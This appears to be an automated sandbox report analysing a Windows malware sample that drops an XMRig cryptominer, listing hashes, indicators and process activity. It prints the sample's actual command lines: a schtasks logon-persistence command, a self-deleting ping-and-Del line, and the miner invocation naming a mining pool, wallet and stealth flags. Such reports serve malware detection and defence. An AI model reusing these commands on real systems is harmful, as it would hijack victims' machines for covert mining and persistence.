Analysis
-
max time kernel
152s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
25-09-2022 13:43
Static task
static1
Behavioral task
behavioral1
Sample
35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe
Resource
win10v2004-20220812-en
General
-
Target
35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe
-
Size
354KB
-
MD5
e141967a41334d6dd1d7c7adac5ca003
-
SHA1
6f6200ad4360b17ee575b4a761dadc213d34e1b5
-
SHA256
35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2
-
SHA512
53cad1f2170ec291b2088ac290a8d47c868d2e53d5276d9cf9efe5d917461f98bbe28c03eee7bf5e354e546b420f60c2f9ec31901566b5e27817a558392324d9
-
SSDEEP
6144:copjgUqY88VzWVa9zTRf7pbyvDROyEcZ:cJUDpyg5da
Malware Config
Signatures
-
XMRig Miner payload 14 IoCs
Processes:
resource yara_rule behavioral1/memory/552-106-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/552-108-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/552-110-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/552-111-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/552-112-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/552-114-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/552-116-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/552-117-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/552-118-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/552-120-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/552-121-0x000000014030F3F8-mapping.dmp xmrig behavioral1/memory/552-123-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/552-125-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/552-129-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Executes dropped EXE 4 IoCs
Processes:
35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe31609.exeservices64.exesihost64.exepid process 1428 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe 1504 31609.exe 1176 services64.exe 1552 sihost64.exe -
Deletes itself 1 IoCs
Processes:
cmd.exepid process 1988 cmd.exe -
Loads dropped DLL 13 IoCs
Processes:
35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exetaskmgr.exe35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe31609.exeservices64.exepid process 1736 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe 1736 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe 876 taskmgr.exe 876 taskmgr.exe 1428 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe 876 taskmgr.exe 876 taskmgr.exe 1504 31609.exe 876 taskmgr.exe 876 taskmgr.exe 1176 services64.exe 876 taskmgr.exe 876 taskmgr.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\Default Key = "C:\\Users\\Admin\\AppData\\Local\\Default Folder\\Server.exe" 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\Default Key = "\\Default Folder\\Server.exe" 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
services64.exedescription pid process target process PID 1176 set thread context of 552 1176 services64.exe explorer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Processes:
services64.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 services64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde services64.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exetaskmgr.exe31609.exeservices64.exepid process 1428 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe 1428 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe 876 taskmgr.exe 876 taskmgr.exe 1428 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 1428 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 1504 31609.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 1176 services64.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 1428 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exepid process 1428 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 464 -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exetaskmgr.exe31609.exeservices64.exeexplorer.exedescription pid process Token: SeDebugPrivilege 1736 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe Token: SeDebugPrivilege 1428 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe Token: SeDebugPrivilege 876 taskmgr.exe Token: SeDebugPrivilege 1504 31609.exe Token: SeDebugPrivilege 1176 services64.exe Token: SeLockMemoryPrivilege 552 explorer.exe Token: SeLockMemoryPrivilege 552 explorer.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
taskmgr.exepid process 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
taskmgr.exepid process 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe 876 taskmgr.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exepid process 1428 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe -
Suspicious use of WriteProcessMemory 54 IoCs
Processes:
35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.execmd.exe31609.execmd.exeservices64.execmd.exedescription pid process target process PID 1736 wrote to memory of 1428 1736 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe PID 1736 wrote to memory of 1428 1736 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe PID 1736 wrote to memory of 1428 1736 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe PID 1736 wrote to memory of 1428 1736 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe PID 1736 wrote to memory of 1988 1736 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe cmd.exe PID 1736 wrote to memory of 1988 1736 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe cmd.exe PID 1736 wrote to memory of 1988 1736 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe cmd.exe PID 1736 wrote to memory of 1988 1736 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe cmd.exe PID 1428 wrote to memory of 876 1428 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe taskmgr.exe PID 1428 wrote to memory of 876 1428 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe taskmgr.exe PID 1428 wrote to memory of 876 1428 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe taskmgr.exe PID 1428 wrote to memory of 876 1428 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe taskmgr.exe PID 1988 wrote to memory of 472 1988 cmd.exe PING.EXE PID 1988 wrote to memory of 472 1988 cmd.exe PING.EXE PID 1988 wrote to memory of 472 1988 cmd.exe PING.EXE PID 1988 wrote to memory of 472 1988 cmd.exe PING.EXE PID 1428 wrote to memory of 1504 1428 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe 31609.exe PID 1428 wrote to memory of 1504 1428 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe 31609.exe PID 1428 wrote to memory of 1504 1428 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe 31609.exe PID 1428 wrote to memory of 1504 1428 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe 31609.exe PID 1504 wrote to memory of 1744 1504 31609.exe cmd.exe PID 1504 wrote to memory of 1744 1504 31609.exe cmd.exe PID 1504 wrote to memory of 1744 1504 31609.exe cmd.exe PID 1744 wrote to memory of 1956 1744 cmd.exe schtasks.exe PID 1744 wrote to memory of 1956 1744 cmd.exe schtasks.exe PID 1744 wrote to memory of 1956 1744 cmd.exe schtasks.exe PID 1504 wrote to memory of 1176 1504 31609.exe services64.exe PID 1504 wrote to memory of 1176 1504 31609.exe services64.exe PID 1504 wrote to memory of 1176 1504 31609.exe services64.exe PID 1176 wrote to memory of 828 1176 services64.exe cmd.exe PID 1176 wrote to memory of 828 1176 services64.exe cmd.exe PID 1176 wrote to memory of 828 1176 services64.exe cmd.exe PID 828 wrote to memory of 332 828 cmd.exe schtasks.exe PID 828 wrote to memory of 332 828 cmd.exe schtasks.exe PID 828 wrote to memory of 332 828 cmd.exe schtasks.exe PID 1176 wrote to memory of 1552 1176 services64.exe sihost64.exe PID 1176 wrote to memory of 1552 1176 services64.exe sihost64.exe PID 1176 wrote to memory of 1552 1176 services64.exe sihost64.exe PID 1176 wrote to memory of 552 1176 services64.exe explorer.exe PID 1176 wrote to memory of 552 1176 services64.exe explorer.exe PID 1176 wrote to memory of 552 1176 services64.exe explorer.exe PID 1176 wrote to memory of 552 1176 services64.exe explorer.exe PID 1176 wrote to memory of 552 1176 services64.exe explorer.exe PID 1176 wrote to memory of 552 1176 services64.exe explorer.exe PID 1176 wrote to memory of 552 1176 services64.exe explorer.exe PID 1176 wrote to memory of 552 1176 services64.exe explorer.exe PID 1176 wrote to memory of 552 1176 services64.exe explorer.exe PID 1176 wrote to memory of 552 1176 services64.exe explorer.exe PID 1176 wrote to memory of 552 1176 services64.exe explorer.exe PID 1176 wrote to memory of 552 1176 services64.exe explorer.exe PID 1176 wrote to memory of 552 1176 services64.exe explorer.exe PID 1176 wrote to memory of 552 1176 services64.exe explorer.exe PID 1176 wrote to memory of 552 1176 services64.exe explorer.exe PID 1176 wrote to memory of 552 1176 services64.exe explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe"C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe"1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe"C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1428 -
C:\Windows\SysWOW64\taskmgr.exe"C:\Windows\System32\taskmgr.exe"3⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:876
-
-
C:\Users\Admin\AppData\Local\Temp\31609.exe"C:\Users\Admin\AppData\Local\Temp\31609.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1504 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit4⤵
- Suspicious use of WriteProcessMemory
PID:1744 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'5⤵
- Creates scheduled task(s)
PID:1956
-
-
-
C:\Users\Admin\AppData\Local\Temp\services64.exe"C:\Users\Admin\AppData\Local\Temp\services64.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1176 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit5⤵
- Suspicious use of WriteProcessMemory
PID:828 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'6⤵
- Creates scheduled task(s)
PID:332
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"5⤵
- Executes dropped EXE
PID:1552
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=45Z2KUa15GKDWbtk11MXVih9n7GnPVpfzW9jk9FuCar8EidLwFBvMH4EoTAzjt7pue3fRnuGx3Sb5g8p4o4mJr3V6Xqu6Cw --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth5⤵
- Suspicious use of AdjustPrivilegeToken
PID:552
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 1000 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe"2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:1988 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 10003⤵
- Runs ping.exe
PID:472
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
43KB
MD5fec701bbc6a35f9089309f34afbed29c
SHA164a546ef3d03c7af30cd5624db0ad2fd6f611e8f
SHA256d69c8a09657c966ff51f3451fc762c8a1519cda2dff109de24aab2e33aaa4409
SHA512b6b466df455cb80e91c5748f4f8847ca0a67e8bb07c70f40c5a548490739d2501093e8343474fcbdf6d3c03dc3e9c0019d87b2283315ae1e63c6bda4a97c807b
-
Filesize
43KB
MD5fec701bbc6a35f9089309f34afbed29c
SHA164a546ef3d03c7af30cd5624db0ad2fd6f611e8f
SHA256d69c8a09657c966ff51f3451fc762c8a1519cda2dff109de24aab2e33aaa4409
SHA512b6b466df455cb80e91c5748f4f8847ca0a67e8bb07c70f40c5a548490739d2501093e8343474fcbdf6d3c03dc3e9c0019d87b2283315ae1e63c6bda4a97c807b
-
C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe
Filesize354KB
MD5e141967a41334d6dd1d7c7adac5ca003
SHA16f6200ad4360b17ee575b4a761dadc213d34e1b5
SHA25635a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2
SHA51253cad1f2170ec291b2088ac290a8d47c868d2e53d5276d9cf9efe5d917461f98bbe28c03eee7bf5e354e546b420f60c2f9ec31901566b5e27817a558392324d9
-
C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe
Filesize354KB
MD5e141967a41334d6dd1d7c7adac5ca003
SHA16f6200ad4360b17ee575b4a761dadc213d34e1b5
SHA25635a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2
SHA51253cad1f2170ec291b2088ac290a8d47c868d2e53d5276d9cf9efe5d917461f98bbe28c03eee7bf5e354e546b420f60c2f9ec31901566b5e27817a558392324d9
-
Filesize
43KB
MD5fec701bbc6a35f9089309f34afbed29c
SHA164a546ef3d03c7af30cd5624db0ad2fd6f611e8f
SHA256d69c8a09657c966ff51f3451fc762c8a1519cda2dff109de24aab2e33aaa4409
SHA512b6b466df455cb80e91c5748f4f8847ca0a67e8bb07c70f40c5a548490739d2501093e8343474fcbdf6d3c03dc3e9c0019d87b2283315ae1e63c6bda4a97c807b
-
Filesize
43KB
MD5fec701bbc6a35f9089309f34afbed29c
SHA164a546ef3d03c7af30cd5624db0ad2fd6f611e8f
SHA256d69c8a09657c966ff51f3451fc762c8a1519cda2dff109de24aab2e33aaa4409
SHA512b6b466df455cb80e91c5748f4f8847ca0a67e8bb07c70f40c5a548490739d2501093e8343474fcbdf6d3c03dc3e9c0019d87b2283315ae1e63c6bda4a97c807b
-
Filesize
7KB
MD59ac3e119ac46c13b65583394ec98fcc7
SHA1df6a749b58413cd1fd7c78ffe11abaf012dcf877
SHA256e1e0738756d5498076391e3e889dfb934e4f183108a9367cb6a2e37c8e71bcf4
SHA512d2262612be676f09bafc61331ba52ebfbbc071c0c4fbfd77bc6efd11bde70e13d06f74c9d1190a22bdb5187312e342c6f9b559b39d865414249aa3767b83c214
-
Filesize
7KB
MD59ac3e119ac46c13b65583394ec98fcc7
SHA1df6a749b58413cd1fd7c78ffe11abaf012dcf877
SHA256e1e0738756d5498076391e3e889dfb934e4f183108a9367cb6a2e37c8e71bcf4
SHA512d2262612be676f09bafc61331ba52ebfbbc071c0c4fbfd77bc6efd11bde70e13d06f74c9d1190a22bdb5187312e342c6f9b559b39d865414249aa3767b83c214
-
Filesize
43KB
MD5fec701bbc6a35f9089309f34afbed29c
SHA164a546ef3d03c7af30cd5624db0ad2fd6f611e8f
SHA256d69c8a09657c966ff51f3451fc762c8a1519cda2dff109de24aab2e33aaa4409
SHA512b6b466df455cb80e91c5748f4f8847ca0a67e8bb07c70f40c5a548490739d2501093e8343474fcbdf6d3c03dc3e9c0019d87b2283315ae1e63c6bda4a97c807b
-
Filesize
43KB
MD5fec701bbc6a35f9089309f34afbed29c
SHA164a546ef3d03c7af30cd5624db0ad2fd6f611e8f
SHA256d69c8a09657c966ff51f3451fc762c8a1519cda2dff109de24aab2e33aaa4409
SHA512b6b466df455cb80e91c5748f4f8847ca0a67e8bb07c70f40c5a548490739d2501093e8343474fcbdf6d3c03dc3e9c0019d87b2283315ae1e63c6bda4a97c807b
-
Filesize
43KB
MD5fec701bbc6a35f9089309f34afbed29c
SHA164a546ef3d03c7af30cd5624db0ad2fd6f611e8f
SHA256d69c8a09657c966ff51f3451fc762c8a1519cda2dff109de24aab2e33aaa4409
SHA512b6b466df455cb80e91c5748f4f8847ca0a67e8bb07c70f40c5a548490739d2501093e8343474fcbdf6d3c03dc3e9c0019d87b2283315ae1e63c6bda4a97c807b
-
\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe
Filesize354KB
MD5e141967a41334d6dd1d7c7adac5ca003
SHA16f6200ad4360b17ee575b4a761dadc213d34e1b5
SHA25635a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2
SHA51253cad1f2170ec291b2088ac290a8d47c868d2e53d5276d9cf9efe5d917461f98bbe28c03eee7bf5e354e546b420f60c2f9ec31901566b5e27817a558392324d9
-
